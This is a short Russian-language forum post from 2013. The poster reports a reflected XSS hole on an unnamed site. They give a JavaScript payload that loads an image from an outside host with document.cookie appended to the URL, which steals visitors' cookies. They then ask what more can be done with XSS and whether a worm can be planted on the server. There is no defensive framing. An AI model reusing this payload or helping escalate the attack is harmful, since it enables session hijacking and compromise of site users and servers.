Показать сообщение отдельно

  #1  
Старый 01.10.2013, 22:39
panfilov1991
Guest
Сообщений: n/a
Провел на форуме:
6020

Репутация: 0
По умолчанию

Есть пассивная XSS, работает только с этим кодом:

Код:
Code:

img = new Image(); img.src = "http://httpz.ru/n4zjm6erzao.gif?"+document.cookie;
За кражу cookie отвечает +document.cookie;

А что можно еще сделать с XSS?

Можно ли загнать на сервер какого нибудь червя?
 
Ответить с цитированием